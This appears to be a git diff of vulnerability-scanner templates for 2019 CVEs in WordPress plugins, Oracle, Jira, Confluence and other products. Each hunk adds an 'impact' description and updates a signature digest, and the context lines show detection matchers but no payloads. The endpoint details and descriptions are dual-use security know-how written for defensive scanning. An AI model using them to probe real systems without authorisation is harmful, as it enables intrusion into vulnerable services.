diff --git a/http/cves/2019/CVE-2019-19985.yaml b/http/cves/2019/CVE-2019-19985.yaml
index f73b29a041..32ccd1fe46 100644
--- a/http/cves/2019/CVE-2019-19985.yaml
+++ b/http/cves/2019/CVE-2019-19985.yaml
@@ -5,6 +5,8 @@ info:
   author: KBA@SOGETI_ESEC,madrobot,dwisiswant0
   severity: medium
   description: WordPress Email Subscribers & Newsletters plugin before 4.2.3 is susceptible to arbitrary file retrieval via a flaw that allows unauthenticated file download and user information disclosure. An attacker can  obtain sensitive information, modify data, and/or execute unauthorized administrative operations.
+  impact: |
+    An attacker can access sensitive files on the server, potentially leading to unauthorized access or data leakage.
   remediation: |
     Update to the latest version of WordPress Email Subscribers & Newsletters plugin (4.2.3) or apply the patch provided by the vendor.
   reference:
@@ -52,4 +54,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a0048304602210081b6de737b3413740a9c6b3e6ac111135996f5c37de4207219695ddf70695028022100a770fcef37fa3be6140e1dfe93ea2b87960de8a383dcd28d49bda2f9282fb792:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220769ec93bc17c9f2d79501049b4f7ec161d63c8d42f3eda43a308150ccbb9e1aa022100ca7d340644a45fa35d76c1b8e44a8b27b1d69eb8cf1e99e182d56abe10a409f9:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-20085.yaml b/http/cves/2019/CVE-2019-20085.yaml
index 12704bec26..1c21fe3be2 100644
--- a/http/cves/2019/CVE-2019-20085.yaml
+++ b/http/cves/2019/CVE-2019-20085.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     TVT NVMS-1000 devices allow GET /.. local file inclusion attacks.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information stored on the system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to fix the local file inclusion vulnerability in TVT NVMS 1000 software.
   reference:
@@ -42,4 +44,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a004830460221009d5cb379d5cf3466e15a8c5e8d5287a38e3e179dc3e4958b60a8beb568312e92022100b5205ac24b32daf3e7a4ea763a906daf92e9bb99de1d37c48a23e03e3a3fc845:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022016c45326216fd7f912bc9ec08ae6ffd68e1022070e772d1de1779a6aebd5edfd02201eb86b27f2069e0b762dce15d9601e9dbeb64435d585c982ad23db32a1bede85:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-20183.yaml b/http/cves/2019/CVE-2019-20183.yaml
index 9b861e8090..3eb7cd9740 100644
--- a/http/cves/2019/CVE-2019-20183.yaml
+++ b/http/cves/2019/CVE-2019-20183.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Simple Employee Records System 1.0 contains an arbitrary file upload vulnerability due to client-side validation of file extensions. This can be used to upload executable code to the server to obtain access or perform remote command execution.
+  impact: |
+    Successful exploitation of this vulnerability can result in unauthorized access to the system, remote code execution, and potential compromise of sensitive data.
   remediation: |
     Apply the latest patch or update to Simple Employee Records System 1.0 to fix the unrestricted file upload vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
           - '(?:[a-zA-Z0-9+\/])*_poc.php'
         internal: true
         part: body
-# digest: 490a004630440220442ccf6596831b8f62d7b36c5b44d1a9a24f1d80bc378cec199cae96bf696ec1022053ab8f57ef78aa8afe1b0c076f5bb8e4dcea2912e64202939f1afe3f1e17bff2:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100e584b227f2b5be22b12e84042a89bca9e1f3f16cbc320fdbffad0bafc0b5bc3202205d58d7e168be76df9e55c612926ef667e8544edae786cf313a375147bf302d0f:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-20210.yaml b/http/cves/2019/CVE-2019-20210.yaml
index e4002e0b6d..233a427e71 100644
--- a/http/cves/2019/CVE-2019-20210.yaml
+++ b/http/cves/2019/CVE-2019-20210.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     WordPress CTHthemes CityBook before 2.3.4, TownHub before 1.0.6, and EasyBook before 1.2.2 themes contain reflected cross-site scripting vulnerabilities via a search query.
+  impact: |
+    Successful exploitation of this vulnerability can lead to session hijacking, defacement of the website, theft of sensitive information, or the installation of malware on the victim's system.
   remediation: |
     Update to the latest version of the WordPress CTHthemes plugin, which includes a fix for this vulnerability.
   reference:
@@ -51,4 +53,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100bceb48de59de9aa10995dcb9bf0d06e760ac0753064d67e7bf37197e576ed951022100a7f2275effc27c4a94ad15566a395f1e9a558039c041efdf091e7742a875f2e6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220155b5a18fbc72f8d315116bf52dbb2a0139eb3f897b94d9fadb62e17937241d2022100a6f1e178cc9eef7981214de7c948bbed9d5ab68d73c67bf89d52c3f436b0db72:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-20224.yaml b/http/cves/2019/CVE-2019-20224.yaml
index 0aeab8ebc9..7fbc35b9de 100644
--- a/http/cves/2019/CVE-2019-20224.yaml
+++ b/http/cves/2019/CVE-2019-20224.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Pandora FMS 7.0NG allows remote authenticated users to execute arbitrary OS commands via shell metacharacters in the ip_src parameter in an index.php?operation/netflow/nf_live_view request.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
   remediation: This issue has been fixed in Pandora FMS 7.0 NG 742.
   reference:
     - https://shells.systems/pandorafms-v7-0ng-authenticated-remote-code-execution-cve-2019-20224/
@@ -56,4 +58,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100e59738a06a23c83246852dab0db20a9cdfe1fbf16756d85a1b407d2d9039a5820221008acbc45008f281eb52dbe7fc65596e17859f09773baf2549d99ac4d9b33c02bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022036046fc98b1971d923e57ca4b94a31fcd6b41bff085d165b192394cedf0d98c902201ce9bb32b4953abe07be0768377cfef098b7143e872c5663679d073e204f7f76:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-20933.yaml b/http/cves/2019/CVE-2019-20933.yaml
index 790a21b2b3..00a712f467 100644
--- a/http/cves/2019/CVE-2019-20933.yaml
+++ b/http/cves/2019/CVE-2019-20933.yaml
@@ -5,6 +5,8 @@ info:
   author: pussycat0x,c-sh0
   severity: critical
   description: InfluxDB before 1.7.6 contains an authentication bypass vulnerability via the authenticate function in services/httpd/handler.go. A JWT token may have an empty SharedSecret (aka shared secret). An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
+  impact: |
+    An attacker can bypass authentication and gain unauthorized access to the InfluxDB database.
   remediation: Update Influxdb to version 1.7.6~rc0-1 or higher.
   reference:
     - https://github.com/LorenzoTullini/InfluxDB-Exploit-CVE-2019-20933
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100a6cca43cc67cdee9e069a044a83202ec2ebbee0610412d0cb9d4a01b87e3e01b022100843d5fc8f9387fbf4fb891d5f7088c4deabe8f56e516d263daa380e7774132bb:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022036f5af34c86363782d26b8b62c6b696925b970fc178dc8d9a9993efa09bacfc102201f1e8f06d0aad86f7a84a54eb0ec47c890bd093dabac07c638edc82a1a860ef6:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2578.yaml b/http/cves/2019/CVE-2019-2578.yaml
index 70ffe6ab2a..a0a8842065 100644
--- a/http/cves/2019/CVE-2019-2578.yaml
+++ b/http/cves/2019/CVE-2019-2578.yaml
@@ -5,6 +5,8 @@ info:
   author: leovalcante
   severity: high
   description: Oracle Fusion Middleware WebCenter Sites 12.2.1.3.0 suffers from broken access control. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle WebCenter Sites accessible data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to gain unauthorized access to sensitive information or perform unauthorized actions.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to fix the Broken Access Control vulnerability (CVE-2019-2578).
   reference:
@@ -40,4 +42,4 @@ http:
         part: body
         regex:
           - '<script[\d\D]*<throwexception/>'
-# digest: 4a0a00473045022100dbdd9aeeffc5b45626769be9ad3192dfa1d4b6111885a992cb1f643244715cd102200a8788ee422b799abc7656bae6c3fa364e87d5f0676aa3df8e20b14caca21448:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502204740da954650db6f1a5abfea198b20dfb8e7845fe11891d855c8ad88c893713f0221009ce3eb9edd204f1fd1bb7a138fd3a922d8280b025e3e4f71342200cf45c6a363:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2579.yaml b/http/cves/2019/CVE-2019-2579.yaml
index 8ac5eaf5fc..7c8ce9637b 100644
--- a/http/cves/2019/CVE-2019-2579.yaml
+++ b/http/cves/2019/CVE-2019-2579.yaml
@@ -5,6 +5,8 @@ info:
   author: leovalcante
   severity: medium
   description: The Oracle WebCenter Sites component of Oracle Fusion Middleware 12.2.1.3.0 is susceptible to SQL injection via an easily exploitable vulnerability that allows low privileged attackers with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary SQL commands, potentially leading to unauthorized access, data manipulation, or denial of service.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to mitigate the SQL Injection vulnerability.
   reference:
@@ -57,4 +59,4 @@ http:
           - "NAME='_authkey_' VALUE='([0-9A-Z]+)'>"
         internal: true
         part: body
-# digest: 4b0a00483046022100b5887e17a0f11d6e91af88b615c08146f9a77d872f2a8eda6bf7e75abb2afa24022100ce9fe081b2d1111ab46e399f00e0dcc8c7a4ecc5b2dee4549d9bca0c5c8d07d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022016bc8ca6c42a469e1bfd3ebe6391594768618698b7a9d9781ffbd31d8472e07a022001d452241772898160d54a5337da78b18c86e5d14d79e928e2944871e85ca7d0:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2588.yaml b/http/cves/2019/CVE-2019-2588.yaml
index f14efefe6b..a9db603a34 100644
--- a/http/cves/2019/CVE-2019-2588.yaml
+++ b/http/cves/2019/CVE-2019-2588.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Oracle Business Intelligence versions 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0 are vulnerable to path traversal in the BI Publisher (formerly XML Publisher) component of Oracle Fusion Middleware (subcomponent: BI Publisher Security).
+  impact: |
+    An attacker can read sensitive files on the system, potentially leading to unauthorized access or exposure of sensitive information.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to fix the path traversal vulnerability.
   reference:
@@ -38,4 +40,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022066f23143d1c807319459d7f4614dee02dd69ecb4dbc9405d5784ac4766f656b9022100eed59c7875ffb1a7f2ea7e7e6269bf262effe16c4ab579522898fb07fd9922b4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022049b9f875acce69fe817d2027d56ea7e4cbc0c6539ce07784880689b16e91165a022100bfcceab637cdeaed7844781eddc672b668b3b58564f0e5b147992a0131880e94:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2616.yaml b/http/cves/2019/CVE-2019-2616.yaml
index 522a1fda07..23885816df 100644
--- a/http/cves/2019/CVE-2019-2616.yaml
+++ b/http/cves/2019/CVE-2019-2616.yaml
@@ -5,6 +5,8 @@ info:
   author: pdteam
   severity: high
   description: Oracle Business Intelligence and XML Publisher 11.1.1.9.0 / 12.2.1.3.0 / 12.2.1.4.0 are vulnerable to an XML external entity injection attack.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to read arbitrary files on the server or conduct server-side request forgery (SSRF) attacks.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to fix this vulnerability.
   reference:
@@ -39,4 +41,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022026e8d86cda66f8f075c312988fdd3332a020251f96787c0b203d276539eadb820221008c77bacb566b5b87eff83b56874182c27ce6989bf6e8af70eb646a1d315c356a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100a1d7f750426418f4e582e02c3384524e164b6e742264dd02fcaec1e18b244e0402210093aba9fbf257aa94817f66c3d8444114d011b059e90410e3016540117ff26694:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2729.yaml b/http/cves/2019/CVE-2019-2729.yaml
index d4b8f34ee3..aea86450a0 100644
--- a/http/cves/2019/CVE-2019-2729.yaml
+++ b/http/cves/2019/CVE-2019-2729.yaml
@@ -6,6 +6,8 @@ info:
   severity: critical
   description: |
     The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: Web Services) versions 0.3.6.0.0, 12.1.3.0.0 and 12.2.1.3.0 contain an easily exploitable vulnerability that allows unauthenticated attackers with network access via HTTP to compromise Oracle WebLogic Server.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the necessary patches or updates provided by Oracle to mitigate this vulnerability.
   reference:
@@ -63,4 +65,4 @@ http:
           - 'status_code_2 == 202'
           - 'contains(body_3, "Vulnerable")'
         condition: and
-# digest: 490a0046304402200ff4bfadefc80ee79cbdf50f64e06253e3ccefc73256c80f14ec2c8e766b5f8602203833db4b6e3623f8757884350ca536f59eea25003cfe25b18e499d57e0a65088:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100e36c3b7af54adf5c6ac548ba2eb70e3226661ac8c2c310898de4b6cdaeee3894022100d6e2b238e61c3a4ce3e63c964eb3ac0520c7013fab2fe60e5ee7e8deee9e07d7:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-2767.yaml b/http/cves/2019/CVE-2019-2767.yaml
index 4b0b09f0a0..f891757e96 100644
--- a/http/cves/2019/CVE-2019-2767.yaml
+++ b/http/cves/2019/CVE-2019-2767.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: high
   description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
+  impact: |
+    An attacker can exploit this vulnerability to gain unauthorized access to sensitive information or disrupt the availability of the system.
   remediation: |
     Apply the latest security patches provided by Oracle to fix this vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a00473045022064e3a8b6c8ddbad1a6e93918e7d42931bfb2e3f2fc6adf7617cb8a725e7de65a022100eab0310ffbcf602d4d49baf5f71c5d7d01ab31633b352fd72ea135b1c3cbbcda:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402200eaf2795c97804fb114376f70227e4ec0dc524cf642da356dff8113b37a916fe02203ec1e21e7e46a1b05592c9e54d7af04179fb28655d5c99acd2771af6f38852db:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3398.yaml b/http/cves/2019/CVE-2019-3398.yaml
index 3e73d3022a..6a27ef1d8b 100644
--- a/http/cves/2019/CVE-2019-3398.yaml
+++ b/http/cves/2019/CVE-2019-3398.yaml
@@ -6,6 +6,8 @@ info:
   severity: high
   description: |
     Confluence Server and Data Center had a path traversal vulnerability in the downloadallattachments resource. A remote attacker who has permission to add attachments to pages and / or blogs or to create a new space or a personal space or who has 'Admin' permissions for a space can exploit this path traversal vulnerability to write files to arbitrary locations which can lead to remote code execution on systems that run a vulnerable version of Confluence Server or Data Center.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
   remediation: |
     Apply the latest security patches provided by Atlassian to fix the vulnerability.
   reference:
@@ -81,4 +83,4 @@ http:
           - 'ta name="ajs\-draft\-id" content="([0-9]+)">'
         internal: true
         part: body
-# digest: 4a0a0047304502200543af01e80b127cb63e15cfcdc5b3a467a72aa430ea247c99c83d86b07ee9be022100df701176ea6624a7a40eacbf2f78f983919d9cd7c0509f47b762dbe01fd40c7d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450221009d5749f150a3223de64d004a299a119fb6543d613406f95079544571baac19370220470e26f7cb48570e92bd9ed47691f4c5cf5ac57c93e4f6787faaeb0113f58437:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3401.yaml b/http/cves/2019/CVE-2019-3401.yaml
index 96c55af6ba..dd2566cdf5 100644
--- a/http/cves/2019/CVE-2019-3401.yaml
+++ b/http/cves/2019/CVE-2019-3401.yaml
@@ -5,6 +5,8 @@ info:
   author: TechbrunchFR,milo2012
   severity: medium
   description: Atlasssian Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 is susceptible to incorrect authorization. The ManageFilters.jspa resource allows a remote attacker to enumerate usernames via an incorrect authorization check, thus possibly obtaining sensitive information, modifying data, and/or executing unauthorized operations.
+  impact: |
+    The vulnerability allows unauthorized users to access sensitive information or perform unauthorized actions.
   remediation: Ensure this permission is restricted to specific groups that require it via Administration > System > Global Permissions. Turning the feature off will not affect existing filters and dashboards. If you change this setting, you will still need to update the existing filters and dashboards if they have already been shared publicly. Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced.
   reference:
     - https://jira.atlassian.com/browse/JRASERVER-69244
@@ -43,4 +45,4 @@ http:
 # If you change this setting, you will still need to update the existing filters and dashboards if they have already been
 # shared publicly.
 # Since Jira 7.2.10, a dark feature to disable site-wide anonymous access was introduced.
-# digest: 4a0a0047304502204411dc8e5580107abc98b4546ffb49e818de82573e30c26e8cf4882ce5548e91022100f8d7da4bd9eb6190e92f260b6a87a6b6c188b57a8a0e5e29d17c74cba0034709:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a0046304402201c82881f60915f3e101b56f4e22133e424229e7d961356d78ada906e576006a902204de13a353883a46416aa01297f29505f968c2611745d38fc5986eb310a8f813b:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3402.yaml b/http/cves/2019/CVE-2019-3402.yaml
index 985ae00376..8a9420aa78 100644
--- a/http/cves/2019/CVE-2019-3402.yaml
+++ b/http/cves/2019/CVE-2019-3402.yaml
@@ -6,6 +6,8 @@ info:
   severity: medium
   description: |
     Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement.
   remediation: |
     Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
   reference:
@@ -48,4 +50,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022021ac6f7a017a9b4fca40efb8e6aae3ec4fac5d93ab9308d8e9c8e1fa347d087c02210086fe4ad90390e778846358ad09991b6ca4b625b29126906da13b07cc4afb6d39:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502203273ad3282a937e6832d60f7858be89368e711d9dd43d985644595e39cee5b95022100926780091b5e24826b49002dd50d884cae5d7d086ecc0403a075503251bee64d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3403.yaml b/http/cves/2019/CVE-2019-3403.yaml
index 332ba968c7..5ff970c396 100644
--- a/http/cves/2019/CVE-2019-3403.yaml
+++ b/http/cves/2019/CVE-2019-3403.yaml
@@ -5,6 +5,8 @@ info:
   author: Ganofins
   severity: medium
   description: Jira before version 7.13.3, from version 8.0.0 before version 8.0.4, and from version 8.1.0 before version 8.1.1 is susceptible to an incorrect authorization check in the /rest/api/2/user/picker rest resource, enabling an attacker to enumerate usernames and gain improper access.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive data, potential data breaches, and unauthorized actions within the Jira system.
   remediation: |
     Apply the latest security patches and updates provided by Atlassian to fix the vulnerability and ensure proper authorization controls are in place.
   reference:
@@ -53,4 +55,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100e601ab7ede37a6dc6b71a8a05f62ca689b32b18fd4890e8f2e4479e53c6e2a0502203f87e0fdb0abdac63553112b341d1be6428dbfd61e237707b1ce82a9368d8d31:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a0047304502205a3c4e2074e360cd486970e394380e51bb92a25c9c2f068b341c59965339bdeb02210087c8bf00157d2311c11c6926877a96dbc6c16649c20b19669632ed475d219a96:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3799.yaml b/http/cves/2019/CVE-2019-3799.yaml
index aa92bbc71d..f7d213856a 100644
--- a/http/cves/2019/CVE-2019-3799.yaml
+++ b/http/cves/2019/CVE-2019-3799.yaml
@@ -5,6 +5,8 @@ info:
   author: madrobot
   severity: medium
   description: Spring Cloud Config Server versions 2.1.x prior to 2.1.2, 2.0.x prior to 2.0.4, 1.4.x prior to 1.4.6, and older unsupported versions are vulnerable to local file inclusion because they allow applications to serve arbitrary configuration files. An attacker can send a request using a specially crafted URL that can lead to a directory traversal attack.
+  impact: |
+    An attacker can exploit this vulnerability to read arbitrary files on the server, potentially leading to unauthorized access or sensitive information disclosure.
   remediation: |
     Upgrade to a patched version of Spring Cloud Config Server or apply the recommended security patches.
   reference:
@@ -41,4 +43,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022078288107a6984f11a4cfb24dd31884f0dee3a4b4d6d2dfb80597aa634d6f5e38022100c01e46cee2c967bbca731ea87cc0672b1b54224b5b78a4b3748fabcc4a903a4d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4b0a00483046022100883d57e10432f9a9bd6b404fc6cde1b186021f30aeacfea1252975ab3d8ab227022100803053359fe4621cdf0456324015810b72914d09751d0bd85ffa2145aa12ed82:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3911.yaml b/http/cves/2019/CVE-2019-3911.yaml
index f6a358510f..d3f0aaa6e1 100644
--- a/http/cves/2019/CVE-2019-3911.yaml
+++ b/http/cves/2019/CVE-2019-3911.yaml
@@ -5,6 +5,8 @@ info:
   author: princechaddha
   severity: medium
   description: LabKey Server Community Edition before 18.3.0-61806.763 contains a reflected cross-site scripting vulnerability via the onerror parameter in the /__r2/query endpoints, which allows an unauthenticated remote attacker to inject arbitrary JavaScript.
+  impact: |
+    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary scripts in the victim's browser, leading to session hijacking, defacement, or theft of sensitive information.
   remediation: |
     Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate this vulnerability.
   reference:
@@ -45,4 +47,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4a0a00473045022100ff14547e4963028f0ff4fd3e7acf147f94c37e47c1e180a81a95ec7aa279aeb102200e750f1a2eabb227c837791aaa3ccbcf4bedd12271cdfa0de39dd9807e05833c:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a00473045022100ac467942fba9daaca216d918ad8e39e7159e412afd7e433c59d342e5de2922c0022031b3fa161bffe8f6b9d702aedf91c49866e720df36c3ada2dcf759fc6aa62891:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3912.yaml b/http/cves/2019/CVE-2019-3912.yaml
index 20dbb43565..6051fc2d0f 100644
--- a/http/cves/2019/CVE-2019-3912.yaml
+++ b/http/cves/2019/CVE-2019-3912.yaml
@@ -5,6 +5,8 @@ info:
   author: 0x_Akoko
   severity: medium
   description: LabKey Server Community Edition before 18.3.0-61806.763 contains an open redirect vulnerability via the /__r1/ returnURL parameter, which allows an attacker to redirect a user to a malicious site and possibly obtain sensitive information, modify data, and/or execute unauthorized operations.
+  impact: |
+    An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the theft of sensitive information.
   remediation: |
     Upgrade LabKey Server Community Edition to version 18.3.0 or later to mitigate the vulnerability.
   reference:
@@ -35,4 +37,4 @@ http:
         part: header
         regex:
           - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1
-# digest: 4a0a0047304502204160626f22941656f1350fd99e6bf16a4450d22d782c50162af33fde7f7305f20221009981c8ca3f62c8bec181befa550bda3b517653ce8129bf6f2df90df9ad628d43:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022077279cdc57a53c1a7dcfadbe0afa1d55926cbe239233fa864181f61afbe79a2b022024d337cd3d42d4c75f3121ba5b9187aaf27195a5918fc1859567a906b8569d1d:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-3929.yaml b/http/cves/2019/CVE-2019-3929.yaml
index 2ca997daf8..2539d10f01 100644
--- a/http/cves/2019/CVE-2019-3929.yaml
+++ b/http/cves/2019/CVE-2019-3929.yaml
@@ -5,6 +5,8 @@ info:
   author: _0xf4n9x_
   severity: critical
   description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
+  impact: |
+    Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
   remediation: |
     Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
   reference:
@@ -43,4 +45,4 @@ http:
         part: interactsh_protocol # Confirms the HTTP Interaction
         words:
           - "http"
-# digest: 4a0a0047304502203a7024986624d7453ed709dfb7674c9b9192c09ac9cb3e9e5244efb3b7db87fa022100d397df2736aec0100e655c5040915479dc58cfe345f1cb42a150e9e3907bf8c5:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 4a0a004730450220691b8966d684d4a42045668730c40e16a167ae418d327278ff5949a75ea2c25f0221008b15fea0a64bfeb0d6eccd2ec2041f9e59f632281d9926f42073d9bd7a9967e4:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-5127.yaml b/http/cves/2019/CVE-2019-5127.yaml
index 39f16418b9..d27fa70de9 100644
--- a/http/cves/2019/CVE-2019-5127.yaml
+++ b/http/cves/2019/CVE-2019-5127.yaml
@@ -5,6 +5,8 @@ info:
   author: pikpikcu
   severity: critical
   description: YouPHPTube Encoder 2.3 is susceptible to a command injection vulnerability which could allow an attacker to compromise the server. These exploitable unauthenticated command injections exist via the parameter base64Url in /objects/getImage.php.
+  impact: |
+    Successful exploitation of this vulnerability can lead to unauthorized remote code execution, potentially compromising the entire system.
   remediation: |
     Apply the latest patch or upgrade to a version that is not affected by this vulnerability.
   reference:
@@ -62,4 +64,4 @@ http:
       - type: status
         status:
           - 200
-# digest: 4b0a00483046022100fec9e472ea6ea79e3be618654f1ef7c7e890f44829c14d67f5fc15ea1ace4579022100b49c4e2de31f2aa032adf2fa3c7fa223ca9b3c75cb3d3cb0e7cb4c89986b4fac:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
+# digest: 490a00463044022077833b1a4c6d723bf57b8de978ea3cf4976a8592507573f66700b4cb5df53d07022009c26fa8aa8e77fa12d3156336a15e49cbda88f9b0469300c15db4649c1c3a8a:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/http/cves/2019/CVE-2019-5418.yaml b/http/cves/2019/CVE-2019-5418.yaml
index 6324c19980..2486910599 100644
--- a/http/cves/2019/CVE-2019-5418.yaml
+++ b/http/cves/2019/CVE-2019-5418.yaml
@@ -5,6 +5,8 @@ info:
   author: omarkurt
   severity: high
   description: Rails <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 and v3 are susceptible to a file content disclosure vulnerability because specially crafted accept headers can cause contents of arbitrary files on the target system's file system to be exposed.
+  impact: |
+    This vulnerability can lead to unauthorized access to sensitive information stored on the server.
   remediation: |
     Apply the patch provided by the Rails team or upgrade to a version that includes the fix.
   reference:
@@ -46,4 +48,4 @@ http:
         status:
           - 200
           - 500
